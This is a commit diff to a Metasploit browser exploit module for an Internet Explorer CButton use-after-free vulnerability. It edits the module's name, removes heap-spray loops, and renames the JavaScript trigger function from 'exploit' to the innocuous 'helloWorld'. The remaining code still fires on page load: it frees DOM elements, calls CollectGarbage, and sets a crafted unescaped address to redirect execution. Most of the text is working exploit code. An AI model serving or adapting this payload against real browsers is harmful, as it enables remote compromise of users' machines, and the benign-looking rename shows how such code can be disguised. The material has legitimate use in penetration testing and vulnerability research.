Merge branch 'master' of git://github.com/rapid7/metasploit-framework

modules/exploits/windows/browser/ie_cbutton_uaf.rb

@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info={})
 		super(update_info(info,
-			'Name'           => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
+			'Name'           => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
 			'Description'    => %q{
 					This module exploits a vulnerability found in Microsoft Internet Explorer. A
 				use-after-free condition occurs when a CButton object is freed, but a reference
@@ -187,37 +187,11 @@ Stack Pivoting to eax:
 		<script>
 		#{js}
 
-		function exploit()
+		function helloWorld()
 		{
 			var e0 = null;
 			var e1 = null;
 			var e2 = null;
-			var arrObject = new Array(3000);
-			var elmObject = new Array(500);
-			for (var i = 0; i < arrObject.length; i++)
-			{
-				arrObject[i] = document.createElement('div');
-				arrObject[i].className = unescape("ababababababababababababababababababababa");
-			}
-
-			for (var i = 0; i < arrObject.length; i += 2)
-			{
-				arrObject[i].className = null;
-			}
-
-			CollectGarbage();
-
-			for (var i = 0; i < elmObject.length; i ++)
-			{
-				elmObject[i] = document.createElement('button');
-			}
-
-			for (var i = 1; i < arrObject.length; i += 2)
-			{
-				arrObject[i].className = null;
-			}
-
-			CollectGarbage();
 
 			try {
 				e0 = document.getElementById("a");
@@ -230,19 +204,14 @@ Stack Pivoting to eax:
 				e2.appendChild(document.createElement('body'));
 			} catch(e) { }
 			CollectGarbage();
-			for(var i =0; i < 20; i++)
-			{
-				arrObject[i].className = unescape("ababababababababababababababababababababa");
-			}
 			var eip = window;
 			var data = "#{Rex::Text.rand_text_alpha(41)}";
 			eip.location = unescape("%u0b30%u0c0c" + data);
-
 		}
 
 		</script>
 		</head>
-		<body onload="eval(exploit())">
+		<body onload="eval(helloWorld())">
 		<form id="a">
 		</form>
 		<dfn id="b">